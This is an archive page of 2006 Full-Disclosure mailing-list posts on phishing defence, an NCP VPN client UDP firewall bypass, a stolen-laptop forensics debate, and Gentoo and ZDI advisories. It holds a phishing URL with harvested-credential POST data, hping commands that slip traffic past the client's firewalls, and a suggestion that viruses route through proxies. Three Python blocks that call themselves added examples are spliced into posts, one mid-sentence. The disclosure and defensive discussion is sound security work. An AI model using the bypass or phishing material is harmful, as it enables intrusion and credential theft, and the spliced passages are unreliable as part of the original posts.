Re: FW: [Full-disclosure] Are consumers being misled by phishing?

2006-06-30 Thread Josh L. Perrymon
-Original Message-
From: Ajay Pal Singh Atwal [mailto:[EMAIL PROTECTED]]
Sent: Friday, 30 June 2006 2:46 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Are consumers being misled by phishing?



> Here is one phishing site for paypal
>
> http://www.yourfreespace.net/users/payal/webscr_cmd=_login-run.html




This is not a bad job of duplication. However, PayPal and similar sites are
used way too much for this type of attack in my opinion. The phishing email
would probably be sent to every email address they could harvest, setting off
every alarm Websense has.



Phishing attacks are most effective when duplicating
something like OWA or Citrix portals.. Or even better -- custom-built company
portals facing the net, and only sent to a handful of addresses gathered from company
X.

One interesting note about the site above is that it seems to relay its data
back to the attacker using POST instead of relying on an underlying mail
program/script..



-- POST data from the phishing site above---

HTtp://www.yourfreespace.net/users/payal/Processing+Login.html?login=done0%3F847password=1email=1altaddr=1checkguar=1PPIPProtPlus=PASS_encIP=62.245.23.454enctype=blowfishcontinue=ProcessingLoginacceptlogin=passacceptpassword=passLoginAttempt=SecureLoginPassSecurityMeasureCode=noneb2baf0b6a57d39abd6c44b48d6fe3559112c21e54b7e705ecc5116b3c7c38c37949e8aa81848934faf0821be04210e8c2ded3c4159edbee3ee1439f3892a3e9Access=1Submit=ProcessingLogincmd=_login-processinglogin_cmd=_login-donelogin_access=11680108541


--


Protecting against this type of attack???
I don't know of many existing content gateways / email filters that will stop
the initial email if the attack is a one-off and sent on a small scale. It's
just some verbiage with an anchor and link to the attacker's IP address or
site hosting the phishing site. A lot of times the web servers have been
compromised and the HTTP server is on a non-standard port, unless port 80 wasn't
used before.

Then when the user clicks on the link in the phishing email it opens the
browser w/o triggering any alarms.. ( I haven't visited any sites that the new
M$ phishing filter picked up from its whitelists)


Enters password.. game over. The attacker now logs in using the newly harvested
credentials. This also works with token password generators ( nothing new here
).. given it's only a 60 second window to login after acquiring the first token
code.



Ideas???
End-user security awareness and training is the most important deterrent.
Whitelisting isn't going to stop small-footprint attacks directed at a single
company and a handful of users.

Most companies believe that blocking HTML in email handicaps email's effectiveness..
( screw the newsletters.. put it on a website )

Users should copy links from the email into the browser but don't.

Certificates will protect where tokens fail.

Network Protection:
I believe that it's possible to develop widgets to alert on this
type of directed phishing attack. First you have to have the ability to
monitor all email traffic. This shouldn't piss off legal because all users
should have already signed off on this.

The most effective would be to monitor all known public email addresses,
including 'planted' email addresses placed in forums and webpages to be
harvested. This would provide a greater % that traffic sent to those addresses
are directed attacks.. (Like an Email Honeypot :)


( yes... need to copyright that one quick muhahah :)

It should be easy to develop an analysis to pick up on standard phishing
emails. You would look for anchors / links with IP addresses that resolve
outside of the known whitelisted address list. This should at
least alert and place the email in a second-level queue for analysis. You could
also do some type of grep on the email link looking for company X verbiage.





M$ Phishing filter may even be USEFUL ( Almost )

So using the methods above you would have a system to alert on potential
phishing attacks, scanning all emails or preferably only public emails including
planted ones.

The widget performs analysis to determine if the email is a phishing attack.

This process could be automated to perform the whois and so on… So now we should have determined the IP or
block for the hosted phishing site. We
can use something like M$ phishing filter. Send it the new whitelisted IP
address of the phishing site and the browser should block the site. If the
widget monitors all emails coming into the company then it should have the
ability to do some trending of who received certain emails.. sorted on subjects
for instance. Once you found the phishing email you would have a known list of
all email addresses that received the email once the attack has been spotted.



This could be used as additional analysis to monitor traffic
after the attack. 





Just some ideas I have had. If anyone is interested 
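One way to implement the anchor analysis Josh sketches above (links whose host is a raw IP or sits outside the known whitelist, links that carry company X verbiage but point at a foreign host, links on a non-standard port), written as an added example for this thread rather than code from the original post. The whitelist, the company keywords and the sample mail body are constructed; the PayPal lookalike URL is the one quoted earlier in the thread.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed whitelist of hosts company X legitimately links to, and the
# "company X verbiage" to look for in link text and paths.
WHITELIST = {"example-corp.com", "paypal.com"}
COMPANY_WORDS = ("example-corp", "paypal")


def host_allowed(host, whitelist=WHITELIST):
    """True if host is a whitelisted domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == w or host.endswith("." + w) for w in whitelist)


def is_ip_literal(host):
    """True if the link host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def score_anchor(href, text):
    """Return the reasons (possibly none) this anchor deserves a second look."""
    reasons = []
    parsed = urlparse(href)
    host = parsed.hostname or ""
    if parsed.scheme not in ("http", "https") or not host:
        return reasons  # mailto:, relative and other links are out of scope
    if is_ip_literal(host):
        reasons.append("link host is a raw IP address")
    if not host_allowed(host):
        reasons.append("link host %s is outside the whitelist" % host)
        # Company name in the visible text or path, but the host is not theirs.
        blob = (text + " " + parsed.path).lower()
        if any(w in blob for w in COMPANY_WORDS):
            reasons.append("company name in link text/path on a foreign host")
    if parsed.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % parsed.port)
    return reasons


def analyse_html(body):
    """Map each suspicious href in an HTML mail body to its list of reasons."""
    collector = AnchorCollector()
    collector.feed(body)
    flagged = {}
    for href, text in collector.anchors:
        reasons = score_anchor(href, text)
        if reasons:
            flagged[href] = reasons
    return flagged


# Constructed HTML mail body: one legitimate OWA link, one fake portal on a
# raw IP and odd port, and the PayPal lookalike URL quoted in this thread.
SAMPLE_MAIL = """<html><body>
<p>Your Example-Corp webmail password expires today.</p>
<a href="https://mail.example-corp.com/owa/">Example-Corp OWA</a>
<a href="http://192.0.2.10:8080/owa/login.html">Example-Corp Webmail</a>
<a href="http://www.yourfreespace.net/users/payal/webscr_cmd=_login-run.html">PayPal login</a>
</body></html>"""

if __name__ == "__main__":
    for href, reasons in analyse_html(SAMPLE_MAIL).items():
        print(href, "->", "; ".join(reasons))
```

Anything returned by analyse_html is a candidate for the second-level queue, not a verdict; the whitelist has to be maintained or the legitimate links start showing up too.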

Re: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program

2006-06-30 Thread c0redump
Google STRIDE and DREAD in terms of computer security; 
http://wiki.okopipi.org/wiki/Security_concerns


-- c0redump

- Original Message - 
From: huan chen

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 3:40 AM
Subject: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program


forwarding to this list for opinion...

- Original Message - 
From: huan chen [EMAIL PROTECTED]

To: Web Security [EMAIL PROTECTED]
Sent: Thursday, June 29, 2006 3:51 PM
Subject: [WEB SECURITY] Application Security Program



List,

We are trying to design a big-picture information security program for our
organization. The goal is to concentrate on application security. Sub-tasks
should include stuff like policy gap analysis, pen test black box and
white box, etc. The goal is to do all the activities and measure progress
on a yearly basis.


Are there any existing frameworks? Anything that has worked / not worked
for you guys?


Thanks




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 





Re: FW: [Full-disclosure] Are consumers being misled by phishing?

2006-06-30 Thread Chris Umphress

On 6/29/06, Josh L. Perrymon [EMAIL PROTECTED] wrote:


> Most companies believe that blocking HTML in email handicaps email's
> effectiveness.. ( screw the newsletters.. put it on a website )


Hehe, agree with you there.


> Network Protection:
> I believe that it's possible to develop widgets to alert on this type of
> directed phishing attack. First you have to have the ability to monitor all
> email traffic. This shouldn't piss off legal because all users should have
> already signed off on this.


MmmHmm. Enter 1984.


> The most effective would be to monitor all known public email addresses,
> including 'planted' email addresses placed in forums and webpages to be
> harvested. This would provide a greater % that traffic sent to those
> addresses are directed attacks.. (Like an Email Honeypot :)


Planted e-mail addresses are an old idea. And so are e-mail honeypots.

Link: http://wiki.apache.org/spamassassin/ReportingMboxesToRazor

I also found a forum recently (sorry, don't remember the link) where
somebody took the IP address of visitors to his site and encrypted it
into a unique e-mail address so that he could learn the IPs of spam
bots.


> It should be easy to develop an analysis to pick up on standard phishing
> emails. You would look for anchors / links with IP addresses that resolve
> outside of the known whitelisted address list. This should at least
> alert and place the email in a second-level queue for analysis. You could
> also do some type of grep on the email link looking for company X verbiage.


So... anything that doesn't match the whitelist gets tested against
the blacklist? :)

Having a more strict filter for users who aren't in the user's address
book is (IMO) one of the best ways, but that relies more on the end
user than on the company's sys admin.


> M$ Phishing filter may even be USEFUL ( Almost )
>
> So using the methods above you would have a system to alert on potential
> phishing attacks, scanning all emails or preferably only public emails
> including planted ones.
>
> The widget performs analysis to determine if the email is a phishing
> attack.


Thunderbird does some analysis in this area already. It's probably
closely related to the junk filters, but the phishing mails generally
find their way to the Junk or Trash folder before being opened on this
end, so I don't know a lot about it.


> This process could be automated to perform the whois and so on…  So now we
> should have determined the IP or block for the hosted phishing site.  We can
> use something like M$ phishing filter. Send it the new whitelisted IP
> address of the phishing site and the browser should block the site. If the
> widget monitors all emails coming into the company then it should have the
> ability to do some trending of who received certain emails.. sorted on
> subjects for instance. Once you found the phishing email you would have a
> known list of all email addresses that received the email once the attack
> has been spotted.


Performing thousands of WHOIS lookups per day for a medium-sized
business might be a little pricey for the purpose. There are tools
(like SpamAssassin) to filter out spam messages -- Even commercial
programs, but from what I hear, none of them is at 100% efficiency.
Hey, AOL is even charging to be on their white list.

The widget might be useful for companies where all e-mail is only
accessible from a web interface (and e-mail can be deleted from the
local mbox file later), but generally you don't argue with the CEO
when he says he wants to use XYZ e-mail client while he is travelling.
Some of the employees, or worse, management, will see these e-mail
messages on occasion. This means that there would either have to be a
delayed delivery system for incoming e-mail, or the e-mail clients
will have to have an understanding of phishing -- and if that were the
case, then the widget should have caught it anyway. The user still
has to be educated.

My solution is simple. We have deer season, rabbit season, and tourist
season. Start a spammer season!

--
Chris Umphress http://daga.dyndns.org/



RE: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread Castigliola, Angelo
> When the malicious code writers build their viruses and Trojans why not
> code the threats to detect the use of proxy servers and if used, connect
> through them.

Typically you can get to the internet through the default gateway directly from 
the computer without needing to configure proxy settings. A better question 
would be why do viruses run in user-mode versus kernel mode (see 
http://www.phrack.org/show.php?p=62a=6 Kernel-mode backdoors for Windows 
NT)? My guess is that 15-18 year old kids that write viruses mostly use 
recycled code and are often poorly written.

> Working in Corporate America, most firewall configurations block outbound
> TCP 80, as the proxies listen on other non-standard TCP ports.

I do not agree with this. Most corporations allow outbound TCP 80.

I think this thread is more appropriate for focus-virus and not 
Full-disclosure. 

Angelo Castigliola III
Enterprise Security Architecture
UnumProvident 

The posts and threads in this email do not reflect the opinions of nor are 
endorsed by UnumProvident, Inc., nor any of its employees.

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Terminal Entry
Sent: Thursday, June 29, 2006 10:14 AM
To: Bug Traq; Full Disclosure
Subject: [Full-disclosure] Corporate Virus Threats

When the malicious code writers build their viruses and Trojans why not code 
the threats to detect the use of proxy servers and if used, connect through 
them.  Working in Corporate America, most firewall configurations block 
outbound TCP 80, as the proxies listen on other non-standard TCP ports.  A 
virus should first check to determine if a proxy is used and if so use that 
proxy to download the malicious code, backdoor, etc.

Thoughts...
 
Terminal Entry



[Full-disclosure] NCP VPN/PKI Client: UDP Bypassing

2006-06-30 Thread [EMAIL PROTECTED]

Application:NCP VPN/PKI Client
Site:   http://www.ncp.de
Version:8.30, Build 59 and maybe lower
OS: Windows
Possible problem:   UDP Bypassing


Product:

NCP's Secure Communications provides a comprehensive portfolio of 
products for implementing total solutions for high-security remote 
access. These software-based products comply fully with all current 
major technology standards for communication and encryption, as defined 
by the IETF (Internet Engineering Task Force) and ITU (International 
Telecommunication Union). Consequently all products can be smoothly 
integrated into any existing network and communication architectures. 
Your Internet infrastructure, which may already consist of third-party 
security and access components, can be further used without changes - 
thus avoiding any unnecessary administrative costs.



About:
=
There are two 'firewalls' that are part of the NCP VPN/PKI Client: the 'Link 
Firewall' and some sort of 'personal firewall'. The function of the 
'Link Firewall' is to prevent any traffic between an untrusted net and 
an active VPN connection. The 'Link Firewall' can only be turned on or 
off. The 'personal firewall' can be configured with rules like all of 
you probably know from other similar personal firewalls.


For my tests I activated the 'Link Firewall' and configured the 
'personal firewall' to prevent any in- or outbound traffic.



UDP Bypassing, both directions
=
During some configuration tests for the NCP VPN/PKI Client I noticed 
that the machine still received an ip-address via DHCP, although both 
firewalls were enabled. So I did some research and figured out that it's 
possible to send and receive data from and to another machine. On the 
client with the NCP VPN/PKI Client installed you have to use port 68 
(UDP, sending and receiving) and on the 'other side' you have to use 
port 67 (UDP, sending and receiving).


For testing I wrote a little perl script which looks so unbelievably 
embarrassing that I'd better show how to use the bug using hping ;)


So to send something to the machine secured with the NCP VPN/PKI Client 
use hping like this.


hping.exe -2 -c 1 -s 67 -p 68 -e "You should've never gone to Hollywood" $TARGET


To send data from the machine with the NCP VPN/PKI Client to another pc 
use hping like this.


hping.exe -2 -c 1 -s 68 -p 67 -e "You should've never trusted Hollywood" $TARGET


This will also work if you're connected to a VPN.


History:

2006-05-12: Found the possible problems
2006-05-16: Mailed the vendor, no response
2006-05-22: Mailed the vendor again
2006-05-23: The vendor replied
2006-05-26: The vendor replied with technical details


ports

--
SYS 64767



Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Michael Holstein

> The FBI, in a statement from its Baltimore field office, said a
> preliminary review of the equipment by its computer forensic teams
> has determined that the data base remains intact and has not been
> accessed since it was stolen. More tests were planned, however.


Didn't the original wanted notice for this hardware specifically 
mention an external (USB) drive?


Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies'

How are their forensic people going to determine if *that* happened?

Their argument about a real crook wouldn't return the hardware .. 
well, why not? .. $50,000 to buy that fancy ID printer off eBay to get 
yourself started.


/mike.



Re: [Full-disclosure] RFID Attack theory

2006-06-30 Thread Michael Holstein
> So most of the research has been done here already.. Which brings me to 
> the work done by www.rfidvirus.org (http://www.rfidvirus.org).
> They have some really good ideas about attacking the middleware using 
> SQL injections, SSL includes, and buffer overflows on the reader to 
> middleware interface. Some really good stuff.


As small as the actual chips are, imagine how much fun you could have if 
you scattered handfuls of malicious chips around your favorite 
high-security place (airport, office, whatever...).


You could render these high-tech authentication schemes completely 
useless .. just like the military does with their carbon-fiber bombs 
designed to defeat electrical gear.


/mike.



Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Cardoso
I don't think they can detect some highly advanced techniques like using
Partition Magic to mirror the disk..



On Fri, 30 Jun 2006 10:07:46 -0400
Michael Holstein [EMAIL PROTECTED] wrote:

MH The FBI, in a statement from its Baltimore field office, said a
MH preliminary review of the equipment by its computer forensic teams
MH has determined that the data base remains intact and has not been
MH accessed since it was stolen. More tests were planned, however.
MH 
MH Didn't the original wanted notice for this hardware specifically 
MH mention an external (USB) drive?
MH 
MH Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies'
MH 
MH How are their forensic people going to determine if *that* happened?
MH 
MH Their argument about a real crook wouldn't return the hardware .. 
MH well, why not? .. $50,000 to buy that fancy ID printer off eBay to get 
MH yourself started.
MH 
MH /mike.
MH 

year(now) + 1 will be the year of Linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog: 
http://www.carloscardoso.com



Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Michael Braun

Cardoso schrieb:

> I don't think they can detect some highly advanced techniques like using
> Partition Magic to mirror the disk..

As long as they didn't know the exact number of hours the HDD was 
running before it got stolen, I don't see any way to determine if the 
data was copied away by some sector-by-sector copy tool like Ghost or 
True Image. AFAIK you can see very clearly how many hours a drive has 
run so far. If that data was the same as before the laptop was stolen, then 
the disk didn't run. If the data differs, the drive did run.

I am not sure if one could alter that data.
On the other hand... I don't think that anyone knows that data all the 
time, so they couldn't have known the running time of the disk, unless 
they knew the HDD was about to be stolen.


(pardon my bad English)

Michael
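The comparison Michael describes, a drive's usage counters checked against a baseline recorded before the loss, as an added example for this thread and not code from the original post. The `smartctl -A` attribute table and the baseline values are constructed; the check assumes such a baseline was actually captured from the same drive.

```python
import re

# Constructed excerpt of `smartctl -A /dev/sda` output; the numbers are made up.
SMARTCTL_OUTPUT = """\
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       311
  9 Power_On_Hours          0x0032   097   097   000    Old_age   Always       -       1489
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       297
194 Temperature_Celsius     0x0022   036   050   000    Old_age   Always       -       36 (Min/Max 21/48)
"""

# Constructed baseline, as if captured from the same drive before the loss.
BASELINE = {"Power_On_Hours": 1480, "Power_Cycle_Count": 295, "Start_Stop_Count": 309}

# Counters that only move when the drive is actually powered and used.
COUNTERS = ("Power_On_Hours", "Power_Cycle_Count", "Start_Stop_Count")


def parse_smart_attributes(text):
    """Map ATTRIBUTE_NAME -> leading integer of RAW_VALUE from a smartctl -A table."""
    attrs = {}
    for line in text.splitlines():
        fields = line.split()
        # Attribute rows start with a numeric ID and have at least 10 columns;
        # RAW_VALUE may carry a suffix such as "(Min/Max 21/48)", so keep the
        # leading integer only.
        if len(fields) >= 10 and fields[0].isdigit():
            m = re.match(r"\d+", fields[9])
            if m:
                attrs[fields[1]] = int(m.group())
    return attrs


def counters_that_advanced(current, baseline, keys=COUNTERS):
    """Return {name: (baseline, current)} for counters that moved since the baseline."""
    moved = {}
    for k in keys:
        if k in current and k in baseline and current[k] != baseline[k]:
            moved[k] = (baseline[k], current[k])
    return moved


def drive_was_powered(current, baseline):
    """True if any of the usage counters differ from the baseline."""
    return bool(counters_that_advanced(current, baseline))


if __name__ == "__main__":
    now = parse_smart_attributes(SMARTCTL_OUTPUT)
    for name, (before, after) in counters_that_advanced(now, BASELINE).items():
        print(f"{name}: {before} -> {after}")
```

A counter that moved shows only that the drive was powered after the baseline was taken, not what was read from it; without a trusted baseline the check says nothing either way.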



[Full-disclosure] [ GLSA 200606-30 ] Kiax: Arbitrary code execution

2006-06-30 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Kiax: Arbitrary code execution
  Date: June 30, 2006
  Bugs: #136099
ID: 200606-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A security vulnerability in the iaxclient library could lead to the
execution of arbitrary code by a remote attacker.

Background
==

Kiax is a graphical softphone supporting the IAX protocol (Inter
Asterisk eXchange), which allows PC users to make VoIP calls to
Asterisk servers.

Affected packages
=

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-misc/kiax                 < 0.8.5_p1                 >= 0.8.5_p1

Description
===

The iax_net_read function in the iaxclient library fails to properly
handle IAX2 packets with truncated full frames or mini-frames. These
frames are detected in a length check but processed anyway, leading to
buffer overflows.

Impact
==

By sending a specially crafted IAX2 packet, an attacker could execute
arbitrary code with the permissions of the user running Kiax.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Kiax users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/kiax-0.8.5_p1"

References
==

  [ 1 ] CVE-2006-2923
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2923

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-30.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


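The advisory's description turns on one control-flow detail: the length check noticed the short frame but processing continued. The parser below, an added example and not code from the advisory or from the iaxclient project, reads the two IAX2 frame layouts from RFC 5456 (12-byte full frame header, 4-byte mini frame header) and returns early on truncated input instead of reading on; the three datagrams are constructed.

```python
import struct

FULL_HEADER_LEN = 12  # RFC 5456 full frame header size in bytes
MINI_HEADER_LEN = 4   # RFC 5456 mini frame header size in bytes


def parse_iax2_frame(data):
    """Parse one IAX2 datagram; return a dict, or None if it is truncated.

    The F bit (top bit of the first 16-bit word) marks a full frame. The
    length checks here return early; the Kiax bug was a check that noticed
    the short frame but let processing continue past the end of the buffer.
    """
    if len(data) < MINI_HEADER_LEN:
        return None  # too short even for a mini frame header
    first = struct.unpack("!H", data[:2])[0]
    scall = first & 0x7FFF
    if first & 0x8000:
        if len(data) < FULL_HEADER_LEN:
            return None  # truncated full frame: reject, do not process
        dcall_r, ts, oseq, iseq, ftype, csub = struct.unpack("!HIBBBB", data[2:12])
        return {
            "full": True,
            "scall": scall,
            "retrans": bool(dcall_r & 0x8000),
            "dcall": dcall_r & 0x7FFF,
            "timestamp": ts,
            "oseq": oseq,
            "iseq": iseq,
            "type": ftype,
            "c_bit": bool(csub & 0x80),
            "subclass": csub & 0x7F,
            "payload": data[FULL_HEADER_LEN:],
        }
    ts16 = struct.unpack("!H", data[2:4])[0]
    return {"full": False, "scall": scall, "timestamp": ts16,
            "payload": data[MINI_HEADER_LEN:]}


# Constructed test datagrams: a full IAX frame (type 6, subclass 1 = NEW) with a
# 4-byte payload, the same frame cut after 8 bytes, and a 2-byte voice mini frame.
FULL_NEW = struct.pack("!HHIBBBB", 0x8001, 0x0000, 0, 0, 0, 6, 1) + b"\x00" * 4
TRUNCATED_FULL = FULL_NEW[:8]
MINI_VOICE = struct.pack("!HH", 0x0001, 100) + b"\xaa\xbb"


def parsed_summary(data):
    """Short description of what the parser made of a datagram."""
    frame = parse_iax2_frame(data)
    if frame is None:
        return "rejected (truncated)"
    kind = "full" if frame["full"] else "mini"
    return "%s frame, call %d, %d payload byte(s)" % (kind, frame["scall"], len(frame["payload"]))


if __name__ == "__main__":
    for d in (FULL_NEW, TRUNCATED_FULL, MINI_VOICE):
        print(parsed_summary(d))
```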

[Full-disclosure] ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability

2006-06-30 Thread zdi-disclosures
ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-020.html
June 29, 2006

-- CVE ID:
CVE-2006-1467

-- Affected Vendor:
Apple

-- Affected Products:
iTunes

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since April  3, 2006 by Digital Vaccine protection
filter ID 4282. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple iTunes. Exploitation requires an
attacker to convince a target user to open a malicious playlist
file.

The specific flaw exists during the processing of malicious AAC media
files such as those with extensions .M4A and .M4P. During the parsing
of the sample table size atom (STSZ), a malformed 'sample_size_table'
value can trigger an integer overflow leading to an exploitable memory
corruption.

-- Vendor Response:
Apple has addressed this issue in the latest release of iTunes, version
6.0.5. More information is available from the vendor web site at:

http://docs.info.apple.com/article.html?artnum=303952

-- Disclosure Timeline:
2006.04.03 - Digital Vaccine released to TippingPoint customers
2006.04.07 - Vulnerability reported to vendor
2006.06.29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by ATmaCA.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



Re: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread n3td3v

On 6/30/06, Castigliola, Angelo [EMAIL PROTECTED] wrote:

>> When the malicious code writers build their viruses and Trojans why not
>> code the threats to detect the use of proxy servers and if used, connect
>> through them.
>
> Typically you can get to the internet through the default gateway directly from the computer
> without needing to configure proxy settings. A better question would be why do viruses run in
> user-mode versus kernel mode (see http://www.phrack.org/show.php?p=62a=6
> Kernel-mode backdoors for Windows NT)? My guess is that 15-18 year old kids that
> write viruses mostly use recycled code and are often poorly written.
>
>> Working in Corporate America, most firewall configurations block outbound
>> TCP 80, as the proxies listen on other non-standard TCP ports.
>
> I do not agree with this. Most corporations allow outbound TCP 80.
>
> I think this thread is more appropriate for focus-virus and not Full-disclosure.


Full-Disclosure should set up its own dedicated lists for individual
topics like securityfocus.com does.

The thought of going near a Symantec run list makes me cringe.

John Cartwright, can we have more Full-Disclosure lists setup for
specialized topics?

Here are my suggestions:

FD social engineering and phishing list - discussion of social
engineering issues and its variants

FD vulnerability development list - discussion of development and
prevention of vulnerabilities

FD incident response and recovery list - discussion of response and
recovery issues

FD voice over internet protocol list - discussion of VoIP security issues

FD web application security list - discussion of web application, and
AJAX, FJAX secure coding.

FD bug disclosures list - discussion of new security threats and analysis

FD enterprise security list - discussion of corporate security issues,
and patch management, and employee monitoring

FD security careers list - discussion of latest jobs within security industry

FD media coverage list - discussion of security related stories in the news

FD vendor software support list - discussion of security product
support, anti virus, ids, firewall issues, security basics, setting up
software securely

FD is the future! It's time to upgrade FD, so we can take on the might
of Securityfocus.com, and give them a run for their money. Don't copy
Securityfocus though, originate, not duplicate!



[Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO
MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE.

RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM
SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY
COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL
WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT
I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME,
GNNA AND BANTOWNE.  GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE
MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I
FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION
TELL ME BANTOWNE TO BLAME.  SO THROUGH DEVIOUS MEANS I INFILTRATE
BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT
MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT
CALLED #BANTOWN (MINUS THE E TOO).

THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE
MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW
PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE
IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO
FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I
PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF
FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI
TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY
SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL
AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING
VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I
EXCERPT FROM CHANNEL:

incog that reminds me... ill go find xss in fark.com
incog k, i just found xss in imdb... but my memory is so bad that i
dont know if this is new or i just rediscovered it
incog just found xss in youtube
incog i have xss on flickr
incog xss on technocrati
incog weev, i have xss on all turdpress blogs ever
lncog i just found dailykos xss for rolloffle
whatcog I have SA xss
whatcog on secure.somethingawful.com

THAT OVER FEW DAYS OF TALK. INCOG SEEM TO BE MOST BRUTAL SCRIPT-KIDDIE
KNOWN TO MAN, BUT WE CHECK OUT ANOTHER PERSON HE CALLED WEEV. HE
BEEN AROUND THE BLOCK A LONG TIME AND HE HAVE MANY IDEA HOW TO CAUSE
DAMAGE TO FREENODE AND A MAN NAME LILO. AGAIN I EXCERPT FROM
CHANNEL:

weev okay guys
